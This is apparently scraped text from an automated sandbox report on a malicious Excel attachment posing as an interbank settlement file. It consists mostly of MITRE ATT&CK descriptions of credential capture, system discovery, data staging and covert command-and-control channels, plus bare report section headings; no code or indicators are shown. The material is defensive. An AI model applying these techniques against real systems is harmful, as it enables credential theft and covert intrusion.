Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "LIQUIDACION INTERBANCARIA 02_22_2021.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Feuil1.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 1142

General

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre